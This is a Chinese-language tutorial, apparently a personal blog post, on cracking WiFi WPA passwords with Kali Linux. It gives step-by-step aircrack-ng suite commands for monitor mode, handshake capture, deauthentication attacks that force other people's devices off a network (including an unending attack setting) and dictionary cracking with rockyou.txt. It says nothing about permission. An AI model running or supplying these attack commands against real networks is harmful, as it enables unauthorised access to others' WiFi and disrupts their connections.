设备:Kali系统+一块外接无线网卡

网上搜Kali 网卡 选择购买即可.

1.配置网卡

1.默认的VMware USB是没有开启的,需要手动开启.

window键+r->输入services.msc->找到VMware USB Arbitration Service 开启

虚拟机->可移动设备->找到自己无线网卡设备->连接即可.

当时弄了一会不知道自己网卡是否安装成功-_-

可以在右下角查看虚拟机是否识别到无线网卡设备.

)

或者打开终端输入

airmon-ng

出现wlan0即可

2.Wifi扫描和抓包

1.开启网卡的监听模式,监听模式开启后wlan0名字会变成wlan0mon

airmon-ng start wlan0

2.开始扫描

airodump-ng wlan0mon

退出扫描

ctrl+c

问题: 第一次扫描时有扫描信息,因不知原因重新扫描后没有扫描信息(不知道啥原理)
解决: 将无线网卡断开后重新连接.

3.开始抓包

airodump-ng --bssid BSSID -c CH -w 抓包存储的路径 wlan0mon

这里说下BSSID和CH是你之前扫描时得到的Wifi的mac地址和信道频率
抓包成功标志:

看到WPA handshake:mac地址

4.把别人连接到Wifi的设备T下线(没抓到包时)

aireplay-ng -0 数字 -c STATION -a BSSID wlan0mon

数字指的是攻击次数,设置为0时一直攻击

STATION是连接wifi设备的mac地址

BSSID是Wifi的mac地址

抓完包记得把攻击停止

第二种扫描方式wifite

 命令wifite,选中一个target即可

3.用字典文件开始破解密码

解压自带字典文件:

gzip -d /usr/share/wordlists/rockyou.txt.gz

破解

aircrack-ng -w 字典文件 抓包获得的文件
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/home-03.cap

字典文件就是一字典
抓包的文件是.cap后缀名

这里补充下对linux目录结构介绍,如果破解命令出错一般是你当前目录没有切换到/

/--
  |
  |root(~)
  |home

home就是你当前账户,root就是root用户,一般显示为~.

参考http://t.csdn.cn/OfWco